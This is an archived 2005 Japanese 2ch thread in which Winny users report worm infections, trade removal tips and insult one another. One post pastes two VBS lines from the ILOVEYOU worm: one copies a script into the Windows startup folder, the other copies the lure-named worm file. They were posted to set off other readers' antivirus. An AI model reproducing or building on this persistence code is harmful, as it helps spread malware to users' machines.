Winnyを狙ったワーム・ウイルス情報 Part33at DOWNLOAD
Winnyを狙ったワーム・ウイルス情報 Part33 - 暇つぶし2ch209:[名無し]さん(bin+cue).rar
05/02/04 13:12:05 8BB6FK220
>>206
Antinnyのキモは情報漏洩より時限起動の上書きとかACCS砲だと思うんだがどうよ?

210:[名無し]さん(bin+cue).rar
05/02/04 13:36:38 Mvd6Ylzd0
>>209
まだほかにも隠し球があるかもしれんしな。

211:206
05/02/04 14:42:34 jf1a8hDs0
>>209
そんな機能があったのか
知らなかったよ。

212:[名無し]さん(bin+cue).rar
05/02/04 16:35:51 dyt11jkR0
頼むから落ち着いてくれ

213:[名無し]さん(bin+cue).rar
05/02/04 16:52:26 4w7YWTRQ0
昔パソコンの知識ないときnyやってて、exe?何だこれと思って普通にダブクリした(;´д`)
そしたら画面に時々血痕が映るようになって、あんま動作遅いからバスター入れて駆除してたんだ。
そしたら画面が血痕で真っ赤になってヌルポって浮き出てた。
データもバックアップ取ってないのにリカバリしちゃったし…orz


214:[名無し]さん(bin+cue).rar
05/02/04 17:10:02 2CoEtGn/0
>207
>UpFolder.txtからUPフォルダを検出するものがあるかもしれんし確実じゃないな
既にある。Gの亜種だったかな

215:[名無し]さん(bin+cue).rar
05/02/04 21:54:30 ovKbye/m0
既出ならスマソ。

友人がやられた。
十二国史とかいうアニメの外伝と謳ったpdfファイル、
ウイルスバスターで検知不可、開いた瞬間にPCが落ちる。
彼のPCはそのままクラッシュし、店に修理に出したそうな。

ご注意を。

216:[名無し]さん(bin+cue).rar
05/02/04 22:00:24 gYJFoMC20
きちんと因果関係を調べてからウィルスとか言えよ

217:[名無し]さん(bin+cue).rar
05/02/04 22:03:33 Nxs7vmfp0
自分のことを友達とか言うのもやめろよ。

218:[名無し]さん(bin+cue).rar
05/02/04 22:42:51 Oje0VabV0
クラスに一人はいたな、そういう奴。
屁こいても第一 発見者。

219:[名無し]さん(bin+cue).rar
05/02/04 23:08:23 tf2eoV5/0
> 、エテ擎ユ、」
・ョ・罕ー、ネ、キ、ォサラ、ィ、ト。ト

、ノ、ヲ、キ、ニ、ウ、ヲ・ヲ・、・�・ケ、ヒ、メ、テ、ォ、ォ、�ナロ、ヒクツ、テ、ニ
。ヨヒヘ、ャー妤テ、ォ、ォ、�、ッ、鬢、、ハ、タ、ォ、鯑カタ茹ケ。シ・ム。シソキキソ・ヲ・、・�・ケ、ヒー网、、ハ、、。ラ
。ヨ、゚、ハ、ヒキルケキ、ニ、「、イ、ハ、ュ、罍ラ
ナェ、ハサラケヘ、ケ、�、タ、惕ヲ、ォ。」
。ヨ。チ。チ、ハ、ヌ、ケ、ャ。「ソキキソ、ヌ、ケ、ォ、ヘ。ゥ。ラ
、ネ、ォ、筅荀ソ、鯆ソ、、、キ。」

、ネ、ォ。「クタヘユソャ、ネ、鬢ィ、ニニヘ、テ、ォ、ォ、テ、ニ、゚、�。」
ス熙ヌpdf、テ、ニ・゙・ッ・惕ネ、ォ、「、�、タ、テ、ア。ゥ
> ウォ、、、ソスヨエヨ、ヒPC、ャヘ釥チ、�。」
> 、ス、ホ、゙、゙・ッ・鬣テ・キ・�
、テ、ニ、タ、ア、タ、ネ・ヲ・、・�・ケ、ネ、マクタ、、タレ、�、ハ、、、隍ハ。」

220:[名無し]さん(bin+cue).rar
05/02/04 23:24:28 Nxs7vmfp0
>>219
読めねーよ。

221:[名無し]さん(bin+cue).rar
05/02/04 23:46:00 JZdC8rzC0
十二国史とかいうアニメ

222:[名無し]さん(bin+cue).rar
05/02/05 01:10:42 NDOkYjaD0
十二国記とかいうアニメ

223:[名無し]さん(bin+cue).rar
05/02/05 01:48:59 exbHemKn0
何でアニメの外伝でpdfなんだよ、そこからおかしいだろ
まぁ、pdfに偽装したホワイターかなんか踏んで、アボンしたんだろな
何が「ご注意を。」だか、笑わせるな。
お前ごときが出入りしていいスレじゃねーんだよ

224:[名無し]さん(bin+cue).rar
05/02/05 02:07:14 dDbuW0r80
>>220
> ご注意を。
ギャグとしか思えん……

どうしてこうウイルスにひっかかる奴に限って
「僕が引っかかるくらいなんだから超絶スーパー新型ウイルスに違いない」
「みんなに警告してあげなきゃ」
的な思考をするんだろうか。
「~~なんですが、新型ですかね?」
とかもやたら多いし。

とか、言葉尻をとらえて突っかかってみる。
所でpdfってマクロとかあるんだっけ?
> 開いた瞬間にPCが落ちる。
> そのままクラッシュ
ってだけだとウイルスとは言い切れないよな。

225:[名無し]さん(bin+cue).rar
05/02/05 02:28:32 bKWacowp0
「十二国記というアニメの原作小説の外伝」だろうな。


226:[名無し]さん(bin+cue).rar
05/02/05 02:37:06 RjFbOOZ20
ワロス

227:[名無し]さん(bin+cue).rar
05/02/05 11:08:43 Zsq8MkYu0
pdfのアイコンをした、

pdf                                            .exe

228:[名無し]さん(bin+cue).rar
05/02/05 15:29:15 LOJlHRdy0
なかなかいかすな

俺もいつかひっかかりそうでこえー・・。


229:[名無し]さん(bin+cue).rar
05/02/05 15:32:04 vUfi5opH0
pdf ファイル 捨てたい

230:[名無し]さん(bin+cue).rar
05/02/05 15:38:06 QPX9pgds0
pdfを軽快に開くソフトないもんかね
Adobeウザ杉

231:[名無し]さん(bin+cue).rar
05/02/05 15:48:00 zoYqDu3R0
>>48
(一般コミック・雑誌) [ジャンプ] [2005-09] こちら葛飾区亀有公園前派出所.exe は Trojan.Nullpos に感染しています。
先生が対応したみたいでつね。


232:[名無し]さん(bin+cue).rar
05/02/05 15:57:20 qkk5vsyu0
テスト

233:[名無し]さん(bin+cue).rar
05/02/05 17:06:05 /cjGCeRp0
>>230
Adobe Reader 7は、起動時のもたつきがだいぶん軽減されたがな。

234:[名無し]さん(bin+cue).rar
05/02/05 17:32:10 AOqOF5bm0
そうか?
気づいてないだけ?

235:[名無し]さん(bin+cue).rar
05/02/05 18:12:02 KM2azlbW0
たぶん
十二国史.pdf                                                  .exe
だったんだろ    

236:[名無し]さん(bin+cue).rar
05/02/05 22:07:58 0XXw+ljv0
【使用OS】Windows2000
【WindowsUpdateしてるか】している
【使用AntiVirusソフト】なし
【AntiVirusをUpdateしてるか】
【ウイルススキャンの結果】
【オンラインスキャンしたなら結果】できない
【Winnyのバージョン】ver.1.4
【Winny歴、総DL量】2年ぐらい、80G以上
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】実行できない

【症状、具体的に分かる限りすべて書く】
①Windows起動して、スタートアップメニュー読み込んだ後、固まる。
②タスクマネージャーのみ起動はできるけど、閉じれない。
③タスクマネージャーから終了しようとすると、
 ※「3d4」が反応していません。強制終了しますか?と、聞かれる。名前は「3f4」「444」と毎回変わる。
 「explore」も反応しなくなる。
④ログオフはできるけど、再起動、終了はできない。
                   
【何をしたらそんなことになったのか】
~.fcdをDeamonToolでisoに変換し、ダブルクリックしたら感染した。
ファイルの名前は失念。18禁麻雀ソフトだったことは覚えてる。

【これまでにとった措置】
①LANケーブルひっこぬいた。
②タスクマネージャー→プロセスで怪しい.exeを調べたがqttask.exeを切ったときだけ※の症状はなくなった。
③「3d4」をぐぐったけどわからず、qttaskは「Quick Time」関連でウイルスではなかった。
③セーフモードでもウイルスは動いた。
④Windowsの上書きインストールを実行したけど何も変わらず。

「AutoRun+Bat」か「仙台ギャラクシーエンジェルズ」ではないかと
思うのですが。どなたか対処方法教えてください・・・

237:[名無し]さん(bin+cue).rar
05/02/05 22:15:29 YDKFS92r0
クリーンインストール

238:[名無し]さん(bin+cue).rar
05/02/05 22:16:18 /cjGCeRp0
>>236
初期化+新規インスコ+ワクチンソフト買え。
以上。

239:[名無し]さん(bin+cue).rar
05/02/05 22:21:20 Y2rQl+Us0
つかVer.1.4って何だよ
2年も使ってるソフトのバージョンぐらい把握しとけ

ウィルス対策ソフトも入れてない香具師は滅んでよし

240:[名無し]さん(bin+cue).rar
05/02/05 23:08:51 GWfRLaGO0
そこまでいじったファイルの名前を失念するもんなのか

241:[名無し]さん(bin+cue).rar
05/02/05 23:15:07 3TUle1uh0
(´-`).。oO(恥ずかしいタイトルだから言いたくないんじゃないのか)

242:[名無し]さん(bin+cue).rar
05/02/05 23:20:52 0XXw+ljv0
>239
Ver1.14の間違いでした。
>240
本当に覚えてないんです。

Win32.Parite.2(W32.Pinfi, PE_PARITE.A)の症状と似ているので
亜種かもしれません。自分の場合は「ランダムな3文字.exe」なので。
URLリンク(www.viruschaser.jp)


243:[名無し]さん(bin+cue).rar
05/02/05 23:26:27 GgJQ+wLd0
>>242
お帰り下さいませ

244:[名無し]さん(bin+cue).rar
05/02/05 23:42:11 LN3/OJcd0
NISに苺キンタマの通信ログが残ってて
ワラタ 

245:[名無し]さん(bin+cue).rar
05/02/05 23:42:40 0XXw+ljv0
お邪魔しました

246:[名無し]さん(bin+cue).rar
05/02/06 00:17:09 GpfgMHZv0
これを機会に足を洗うか、しっかりワクチン使うんだな。
既存のワクチンで検出できないやつを見つけたら、またおいで。
ここはそういうスレだ。

247:[名無し]さん(bin+cue).rar
05/02/06 00:55:18 E/R+Mbga0
>>230
まずは「Adobe 高速化」でぐぐれ。
オーケー、窓の社の紹介ページが出てきたな?
「Adobe Reader SpeedUp」これが君の探しているだろうソフトだ
あとは下でDLするだけって奴だ
URLリンク(www.tnk-bootblock.co.uk)

248:[名無し]さん(bin+cue).rar
05/02/06 01:06:41 Ep7PvuFL0
>>247
それ使ってたら印刷の際に不具合でた・・・OSがxpのヤシは
最新のやつにすりゃ軽いらしいが

249:[名無し]さん(bin+cue).rar
05/02/06 05:27:52 rJTqmXkQ0
欄検眼段、って何ですか?
おれが撮ったデジカメ画像がny上に流れてるみたい‥

250:[名無し]さん(bin+cue).rar
05/02/06 06:06:37 w/6Acw6k0
>>249

      /   / ̄\                 ヽ
    /    |   |            ヽ     \
    /      .|    .|              \     ヽ
   /       |    |               \    丶
   /      ノ    ノ           /      丶   |
   |      /    / ヽ______ノ           | アチャー
   ヽ    /    /   \      /            |
    ゝ   /    /     \   /            /
     \ ノ   ノ       \/            ノ

251:[名無し]さん(bin+cue).rar
05/02/06 11:38:06 V3CzvDms0
キンタマの亜種新型か
ファイル名のパターンとトリップは統一されてるな

252:[名無し]さん(bin+cue).rar
05/02/06 12:53:56 H8CZ6kHC0
ふぅむ。新型か。
欄検眼段_D__画像_写真関係_写真_F0108.GJB 60HEmEokEq 318,346 64a9055168740465f5735f802fcd60ba
てな感じで流れてる奴か。
ドライブ名とかわかるのは面白いな。写真とかを優先して流してるのか?
まだ実物が手元にないんで推測だが、検索結果だと写真系がやたら目に付くな……

所で「欄検眼段」ってなんて読むんだ?

253:[名無し]さん(bin+cue).rar
05/02/06 12:59:23 r4ZkwkJg0
URLリンク(www.google.com)
なんだろう?

254:[名無し]さん(bin+cue).rar
05/02/06 13:04:05 BOAPM7X00
拡張子.GJBってなんだ?ぐぐっても分からんかった

255:[名無し]さん(bin+cue).rar
05/02/06 13:07:01 r4ZkwkJg0
>>254
極窓氏はなんとおっしゃった?

256:[名無し]さん(bin+cue).rar
05/02/06 13:08:19 NBdQ4BW90
Install.exe 24,576バイト プロパティの詳細→正式ファイル名STA.exe

(App)(アプリ)FINALDATA 3.0 特別復元版(認証クラックパッチ済み).zipfCXSpSVK4D4,616,349完全キャッシュ 60005/02/06 12:275369ca55d4c20558766dee0a760276abd
fCXSpSVK4D 369ca55d4c20558766dee0a760276abd
に入ってて不覚にも踏んだんだが何も起こらん

【使用OS】 XP Pro SP1
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 Norton
【AntiVirusをUpdateしてるか】 している
【ウイルススキャンの結果】 反応無し
【テンプレを読んだか】 読んだ
【これまでにとった措置】 レジストリを自分なりに確認

怖くて再起出来ねえ_| ̄|○
何かのウイルスなのか…?

257:[名無し]さん(bin+cue).rar
05/02/06 13:11:59 NBdQ4BW90
>>255
254じゃないけど極窓には対応していない形式みたいだな

258:[名無し]さん(bin+cue).rar
05/02/06 13:15:23 BOAPM7X00
>>255-257
今、極窓に入れてみた
Joint Photographic Coding Experts Group File「画像」EXIF形式
だってさ。変換したらjpg形式に変換されて中身見えたよ


259:[名無し]さん(bin+cue).rar
05/02/06 13:21:30 6OvmrX750
【合法】女性専用 カレを女みたいにイカせちゃおう!マニュアル 知っとけ.txt 2,053 204cb16508926a2b9253d2806a353c6a
やばいファイルらしいんですが…

260:[名無し]さん(bin+cue).rar
05/02/06 14:55:24 aoUba4KJ0
>>256
UpFolder.txtを書き換えてファイルを勝手にアップロードするタイプのようだ

レジストリのrunからIMJPlG.exeを削除
system32フォルダから当該ファイルを削除
upfolder.txtを元に戻す
勝手に作られたフォルダを削除

で大丈夫だと思う。多分。

261:[名無し]さん(bin+cue).rar
05/02/06 15:08:39 WL7dtHQv0
【使用OS】 XP
【WindowsUpdateしてるか】 今はしているけど感染時はしていなかった
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 今はしているけど感染時はしていなかった
【スキャンした結果(ウイルス名・発見場所)】 感染していなかったけど、ノートンをアップデートしていなかった
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】 128MB以上のjpegファイルがすべて128MBに表示されて画像を見ることができなくなりました。ファイルのサイズは元のままです。
【何をしたらそんなことになったのか】 気がついた時にはなってました。winnyやってるので、落としたファイルを踏んだのだと思います。
【これまでにとった措置】 他の画像ソフトを試してみました。全滅です。
【その他の質問】 元にもどす方法があれば教えてください。デジカメで撮影した思い出の写真もあるので諦めきれません。

262:[名無し]さん(bin+cue).rar
05/02/06 15:09:28 mOjdOBQb0
デジカメキンタマ

mellpo
の情報キボンヌ


263:[名無し]さん(bin+cue).rar
05/02/06 15:20:16 McpvEx4g0
キャッシュにいつのまにかHTMLがいるんだが・・・・
やられちゃった?

264:[名無し]さん(bin+cue).rar
05/02/06 15:34:37 V3CzvDms0
>>261
削除されてるならともかく、多分上書きされてるから元に戻すのは不可能
しかし128MBとはまた大(クマー
>>263
知るか、ってかそれだけの情報でわかるか
気になるならまず自分で一通りのことをしろ

265:[名無し]さん(bin+cue).rar
05/02/06 15:38:48 WL7dtHQv0
>>264
うーん・・
ダメポですか

検索しても、それっぽい記事にあたらないんですよ。
珍しいウィルスなのかしら

すみません、128KBの間違いです。
100KBとか98KBのファイルは無事でした。

266:[名無し]さん(bin+cue).rar
05/02/06 16:06:11 YjUhjOkk0
バスターずっと使ってて先日ノートンに替えた・・・
そしてスキャンしてみた・・・

22個のウィルスが見つかりました。
先生すげぇぇぇ!!バスター市ね!!!



267:[名無し]さん(bin+cue).rar
05/02/06 16:37:04 mOjdOBQb0
>>264
ガッ
てか、mellpoの情報少なすぎ

>>266
両方使えよ
俺は、Norton2003+バスターオンラインを使ってる
片方にしか検出されないウイルスがあるからな

268:[名無し]さん(bin+cue).rar
05/02/06 17:05:57 9PL10oeW0
mellpoはシャレのほうで流行(というほどひっかからんが)じゃないか?
ずっと地引しているけど、50件ぐらいしかひっかからん

269:[名無し]さん(bin+cue).rar
05/02/06 18:39:33 EocYspfo0
>>266
2ch専ブラのログってオチは無いよな?

270:[名無し]さん(bin+cue).rar
05/02/06 19:58:25 UweBoUFo0
>>269
ログってウイルスなのか?

271:[名無し]さん(bin+cue).rar
05/02/06 20:00:38 cGi3nN9+0
>>270
先生がウイルスコードに反応する

272:[名無し]さん(bin+cue).rar
05/02/06 20:03:30 Osr1dyrw0
>>270
たまにわけわからん文字列を書くやつがいるだろ。
先生は感度がいいんで、それをウイルスと混同する。
eicarのコードを書き込んでも反応するんじゃないかな?

273:[名無し]さん(bin+cue).rar
05/02/06 20:13:28 ybSFv8wW0
    ___
  _l≡_、_ |_ (
   (≡´ⅴ`)  ) ウイルスコードなんてしらねーよ・
   <__ヽyゝヽy━・
   /_l:__|
    lL lL

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE- LETTER-FOR-YOU.TXT.vbs

274:[名無し]さん(bin+cue).rar
05/02/06 20:29:21 YjUhjOkk0
>>273
死ね

275:[名無し]さん(bin+cue).rar
05/02/06 20:34:24 ybSFv8wW0
>>274
うるさいよ、厨房
このスレに出入りして、さらにノートンとログブラウザ使ってる人間なら
ウイルスコードの誤作動の回避のための除外設定してないやつがいるわけないだろ

276:[名無し]さん(bin+cue).rar
05/02/06 20:38:11 rJV6Tdi90
むしろあぼーん指定。

277:[名無し]さん(bin+cue).rar
05/02/06 20:40:14 ybSFv8wW0
いやブラウザによるあぼ~んじゃ誤作動するから

278:[名無し]さん(bin+cue).rar
05/02/06 20:48:41 ot7/gjwp0
>>275
ハァ。厨房はお前だよ。

ネット&ウイルス検証用のマシンで頻繁に再インスコするから面倒で設定してないわけだが。

279:[名無し]さん(bin+cue).rar
05/02/06 20:53:54 a+FGygsQ0
今、ノートンがこのスレで反応したぞ。JaneStyleじゃ透明あぼーんでも駄目だな。

280:[名無し]さん(bin+cue).rar
05/02/06 21:03:13 Osr1dyrw0
透明あぼーんは読み込んでから、ルールに従って非表示にしてる
っぽいからな。ファイル自体を検証する先生は反応するだろう。
>>275はこれに反省して、今後二度とウイルスコードを貼らない
と誓え。

281:[名無し]さん(bin+cue).rar
05/02/06 21:05:50 ybSFv8wW0
ちょっと待て面倒とかほざく>278はともかく
>279とかは本気で除外とか知らんのか?

282:[名無し]さん(bin+cue).rar
05/02/06 21:06:27 V3CzvDms0
いいから触んな
>>275みたいな反応する奴がまともに忠告聞き入れると思うか?
黙ってIDであぼんしる。

283:[名無し]さん(bin+cue).rar
05/02/06 21:09:50 jWWdIOPP0
今ここでageたら、ダウソ板見ただけでウィルスに感染しました、という馬鹿が出るわけだな

284:[名無し]さん(bin+cue).rar
05/02/06 21:11:51 ybSFv8wW0
>>283
IEでは無反応
一度ログを取り込む専用ブラウザだから誤動作する
ageてもそれで被害が広がるわけではない
つか、本気でそれぐらいの仕組みもわからないのか?

285:[名無し]さん(bin+cue).rar
05/02/06 21:24:21 qyOpd75d0
ダウンフォルダの中に「zi0o.u30」という謎のファイルが転がってるのですが
これはなんなんでしょう・・

【使用OS】:XP
【WindowsUpdateしてるか:お知らせがある都度している
【使用AntiVirusソフト】:ウイバス
【AntiVirusをUpdateしてるか】:常時行っています
【ウイルススキャンの結果】 :現在スキャン中
【Winnyのバージョン】:2b71
【Winny歴、総DL量】: 半年
【テンプレを読んだか】: 読みました
【テンプレにある対策を実行したか】:
  指定されているフォルダ等チェックしましたがおかしいファイルは確認できてません
【症状、具体的に分かる限りすべて書く】:
  とりあえず怪しいファイルはこれひとつのみでnyフォルダ上、システムフォルダ上に異常はありません
【何をしたらそんなことになったのか】:
  落としたファイルを整理しているときに作成されていました
  ファイルを同フォルダ内に解凍という作業を何回か行っているうちに
  作成されたと思います。それまでには確認されていません
【これまでにとった措置】
  ファイルはごみ箱に移動後消去。ウィルススキャン。
  発見後nyは起動していません

286:[名無し]さん(bin+cue).rar
05/02/06 21:40:07 LWVCKB1T0
>>285
>>1の最初声に出して読め

287:[名無し]さん(bin+cue).rar
05/02/06 21:53:45 WZspEfhk0
バスター2005にアップデートしてから、落としたファイルにどんな怪しいexeが入ってようと全く反応しなくなった。(設定はちゃんとしてる)
まあ前みたいに駆除できないのにウイルス検出しました!ってしつこく出ないからいいけど。

288:[名無し]さん(bin+cue).rar
05/02/06 22:30:24 t/KCdhC80
いいのか?

289:[名無し]さん(bin+cue).rar
05/02/06 23:12:40 PO5OQcip0
>>283
そもそも未だにそんなコードに引っ掛かる様な野師居ないだろ?
他所の板ならまだしも、ここに来るような野師は設定で回避済みだろ・・・

290:[名無し]さん(bin+cue).rar
05/02/06 23:30:53 nl8yXChF0
同意。

291:[名無し]さん(bin+cue).rar
05/02/06 23:36:52 a+FGygsQ0
俺は変えてねーな。別に被害はねーし

292:[名無し]さん(bin+cue).rar
05/02/06 23:43:20 s3x1bN+g0
>>291
>>279みたいな反応が釣りを増長させて
他の住民に迷惑かけることも気にしろよ

293:[名無し]さん(bin+cue).rar
05/02/07 00:09:40 3WuLpAw70
初めて、ポート変えてみた

ファイアウォールログを見てみると
凄い勢いで前のnyポートにアクセスがある


294:[名無し]さん(bin+cue).rar
05/02/07 00:13:24 5yUxK6f20
>>293
ここはお前の日記帳じゃないっ

295:[名無し]さん(bin+cue).rar
05/02/07 01:10:28 01/ZIomG0
>>293
チラシの裏にでも書いてろっ

296:[名無し]さん(bin+cue).rar
05/02/07 01:31:12 jq2iDJat0
俺もはやく使ってみたい>チラシの裏にでも書いてろっ

297:[名無し]さん(bin+cue).rar
05/02/07 03:06:45 9dNmdl470
>>296
チラシの裏にでも書いてろっ

298:[名無し]さん(bin+cue).rar
05/02/07 03:42:34 WkgXewG70
チンコかゆい

299:[名無し]さん(bin+cue).rar
05/02/07 03:47:26 u0/W3fgY0
病院へ逝け

300:[名無し]さん(bin+cue).rar
05/02/07 09:38:03 jff/gz5V0
毎日風呂に入って下着も替えろ。

301:[名無し]さん(bin+cue).rar
05/02/07 15:06:38 fN/XNF0W0
それでも痒いんですが…。

302:[名無し]さん(bin+cue).rar
05/02/07 15:20:23 CjrSnF4v0
切れ!

303:[名無し]さん(bin+cue).rar
05/02/07 15:33:31 wnMIBQAD0
かゆくなるのは玉のほうだろ

304:[名無し]さん(bin+cue).rar
05/02/07 15:43:17 7gmUkW5G0
キンカン塗ると(・∀・)イイ!!

305:[名無し]さん(bin+cue).rar
05/02/07 15:46:19 +MnNa7vf0
メンソレータム塗るともっと(・∀・)イイ!

306:[名無し]さん(bin+cue).rar
05/02/07 15:49:58 3IIPwDdF0
質問にはテンプレを使いましょう。

307:[名無し]さん(bin+cue).rar
05/02/07 18:32:19 gVJkWv8j0
またウイルスか
マカフィー先生ありがとう

もう三回ぐらいひっかかってんな俺

308:[名無し]さん(bin+cue).rar
05/02/07 18:34:35 S7ePl6dF0
マカフィーの法則

309:[名無し]さん(bin+cue).rar
05/02/08 01:43:00 21r51iCG0
ちょいとお尋ねしますが、
他のファイル共有ネットワークでウィルスが
見つかった可能性があるなら、どこに報告すればいいの?

310:[名無し]さん(bin+cue).rar
05/02/08 02:06:21 XLylscR20
そのソフトの本スレじゃないの

311:[名無し]さん(bin+cue).rar
05/02/08 22:01:17 Gy40dB8A0
>>260
サンクス
完全解決しますた

312:[名無し]さん(bin+cue).rar
05/02/08 22:58:40 O3IVKmrB0
URLリンク(uploader.zive.net)
この写真削除したけど、開くとどうなるか詳細教えて

313:[名無し]さん(bin+cue).rar
05/02/08 23:05:05 e3wIJdWc0
どうにもならない手遅れ

314:[名無し]さん(bin+cue).rar
05/02/08 23:09:07 O3IVKmrB0
>>313
ウィルス名で言うと何になるんですか?
これ拡張子がjpgなのに、jpgが開くときの脆弱性を利用して、
ウィルスを混入させるんでしょ?正直どういう仕組みなのかよくわからん
教えてください。


315:[名無し]さん(bin+cue).rar
05/02/08 23:11:56 gb/Lwtpb0
>>314
そんなことより
その圧縮ファイルのアイコンはなんてソフトのもの?

316:[名無し]さん(bin+cue).rar
05/02/08 23:29:47 O3IVKmrB0
>>315
ラプラスだけど
で、ウィルスのプログラムに詳しい方ご教授ください。

317:[名無し]さん(bin+cue).rar
05/02/08 23:35:17 gb/Lwtpb0
>>316
㌧クス

318:[名無し]さん(bin+cue).rar
05/02/08 23:37:57 O3IVKmrB0
>>317
ちなみにスペルはLhaplusね

319:[名無し]さん(bin+cue).rar
05/02/08 23:44:27 idwot2um0
ここ久しぶりに来たけど苺キンタマ以来目立った新種は出てないみたいね。

320:[名無し]さん(bin+cue).rar
05/02/08 23:47:21 O3IVKmrB0
>>319
こち亀exe

321:[名無し]さん(bin+cue).rar
05/02/09 01:42:45 VKcaXPNN0
で、画像見ないでレスするけど>>312の画像ってあやしげなjpgをそのままうpしてんの?
対象をアーカイブに圧縮して「解凍してできるjpgが」ってなら話はわかるが、怪しげなファイルを
そのままうpしたんならウィルスうpしたってことだろ。違法じゃねーの?


322:[名無し]さん(bin+cue).rar
05/02/09 01:52:52 O2/Dnxa+0
この板で違法うpを咎めたところで野暮だよ
逮捕される奴は逮捕される

323:[名無し]さん(bin+cue).rar
05/02/09 02:19:03 xDzEKmpT0
>321
画像見ないでレスする意味がわからん
感染すると思ってビビるほどの低スキルなやつが偉そうに能書きたれるわけもないし

324:[名無し]さん(bin+cue).rar
05/02/09 02:25:39 Zpz0uABU0
とりあえず>>312
>1読まないにも限度があるぞ

325:[名無し]さん(bin+cue).rar
05/02/09 10:32:54 U6ZnYu+o0
このスレの基本的な流れはキンタマ並のウィルスが出回るまで待ちながら
その他の報告に「>>1読め」で無視する流れ

326:[名無し]さん(bin+cue).rar
05/02/09 12:08:11 j1h3syDn0
>>312
はウィルスでもなんでもない
デスクトップキャプチャしてるだけ。
害はないよ。

327:[名無し]さん(bin+cue).rar
05/02/09 13:15:25 wxOqPPuW0
半端にスカすとここまでレス進む

328:[名無し]さん(bin+cue).rar
05/02/09 16:24:59 2RGwgY250
age

329:[名無し]さん(bin+cue).rar
05/02/09 17:58:26 hh2/SOq10
しかし、なんだな
今更exeとかフォルダ偽装とか踏むやついるんだな
キンタマ級の新手が出てきても、そうそう踏ませるのが難しいのでは?
と思ったが。踏むやつはいつになっても踏むのか…、それとも新参も増えてるのか…

330:[名無し]さん(bin+cue).rar
05/02/09 18:38:25 oSvcFUc60
>>312
マジレスするとスパイウェアだがイマイチたいしたこと無い
放置しれ

331:[名無し]さん(bin+cue).rar
05/02/09 19:01:09 2d3y+TiF0
>>330
312の写真は金子で見れば、削除するけど
他のjpgファイルに組み込まれたら怖くないか
ってか、すでにあるの?

332:[名無し]さん(bin+cue).rar
05/02/09 19:51:00 PQZQLfXS0
今度はpngか・・・

333:[名無し]さん(bin+cue).rar
05/02/09 19:53:22 nXOstONM0
新作のプリ×キュアマダー?

334:[名無し]さん(bin+cue).rar
05/02/09 19:54:09 nXOstONM0
誤爆

335:[名無し]さん(bin+cue).rar
05/02/09 19:59:30 B3a3tz0V0
>>331
何言ってるのかさっぱりワカンネ
特に一行目

336:[名無し]さん(bin+cue).rar
05/02/09 20:43:40 3meF1n5f0
最近よくファイルやアプリが応答なしってなるんだけど
こんなウイルスってある?

337:[名無し]さん(bin+cue).rar
05/02/09 20:45:53 Jad6FhQ40
スレ違い。初心者スレに行ってくれ。

338:[名無し]さん(bin+cue).rar
05/02/09 20:56:07 2d3y+TiF0
>>335
金子の写真以外に
ウィルスが組み込まれたjpgはあるのか?ってこと

339:[名無し]さん(bin+cue).rar
05/02/09 20:57:53 xgVpt7RT0
金子の写真ってなに?

340:[名無し]さん(bin+cue).rar
05/02/09 20:58:48 B3a3tz0V0
> 金子の写真

('A`)……?

341:[名無し]さん(bin+cue).rar
05/02/09 21:01:55 2d3y+TiF0
金子は47氏のこと
>>312の写真は金子じゃないの?

342:[名無し]さん(bin+cue).rar
05/02/09 21:04:28 B3a3tz0V0
もう一度47氏の写真とその画像を見比べてごらん



同一人物に見える?
明日早速眼科か精神科に行った方が良いよ。

343:[名無し]さん(bin+cue).rar
05/02/09 21:08:13 2d3y+TiF0
>>342
そうなんだ、、、勘違いしてた。
まぁ誰かは知らないけどこの男の写真以外にも
危険なjpgってあるの?

344:[名無し]さん(bin+cue).rar
05/02/09 21:13:41 LTHSwe0q0
>この男の写真以外にも危険なjpg

自分の認識だと赤シャツ男は、初代ヌルポの副産物であって
無害だが鬱陶しいとそういう感じだったのだが…

345:[名無し]さん(bin+cue).rar
05/02/09 21:15:41 B3a3tz0V0
大体、もし赤服眼鏡の写真が危険なコードを含んでたら
>>312みたくサムネイルを見た時点で感染してるんじゃないか?

危険なJPGが(あるとして)他にも存在するか、という問いなら
あるかもしれない、と答えるだろう。
nyにあるか、というと誰にもわからないけどな。

まず無いと思うけど。

346:[名無し]さん(bin+cue).rar
05/02/09 21:22:01 xgVpt7RT0
危険なjpgってただの”.jpg        .exe”とかじゃねえのか。
それとも俺の知らない間にjpgウィルス出回ってるの?

347:[名無し]さん(bin+cue).rar
05/02/09 21:27:13 2d3y+TiF0
掲示板なんかで、拡張子が.jpgのリンクでも実は画像じゃなくてウィルスサイトに飛ばされる
ことってあるじゃん。2ちゃんにもよく張られてる。
このことと、nyは関係が無いかもしれんが気になった。

348:[名無し]さん(bin+cue).rar
05/02/09 21:27:41 B3a3tz0V0
いや、確かJPGにあるコードを入れておくとウイルスになるっつーのはあった気がする。

でも俺の知ってる奴は、あらかじめexeがハードディスク内にある場合に限り発動するってやつだけど。
JPG画像ファイル単体でウイルスの役目を果たすようなものってまだ無いんじゃないか?
セキュリティホール突くのは別として。

349:[名無し]さん(bin+cue).rar
05/02/10 00:20:38 li/KneUL0
【使用OS】Win2000 SP4
【WindowsUpdateしてるか】はい
【使用AntiVirusソフト】Norton AntiVirus 2003
【AntiVirusをUpdateしてるか】はい
【ウイルススキャンの結果】検出なし
【テンプレを読んだか】はい
【症状、具体的に分かる限りすべて書く】
C:\temp000が作られ(中身は空)、UpFolder.txtに追記されてました。
他、ずっと昔に流行ったozawa.exeのような挙動(白目のない女性の恐怖画像が画面一杯に突然出る。ザザザーのような音も出る)が出てる
これ何すか?

350:[名無し]さん(bin+cue).rar
05/02/10 00:23:56 NZbrBGBV0
ここは初心者の質問・救済スレではありません

351:[名無し]さん(bin+cue).rar
05/02/10 00:43:16 ybgwBGKq0
>>349
でもノートン入ってるのにかかるなんておかしな話だ

352:[名無し]さん(bin+cue).rar
05/02/10 00:44:08 kTvOqxaG0
>>349
そういう挙動をするプログラムなんじゃないの?

353:[名無し]さん(bin+cue).rar
05/02/10 01:02:36 li/KneUL0
すいません、Antinny系でozawaな挙動を示すものなど聞いたこともないので
(検索しても見付からないので)質問してしまいました。
もちろん単なるozawa+Antinny同時感染も疑いました、が、
WIN.INIを確認したところRun=の行自体がなく、
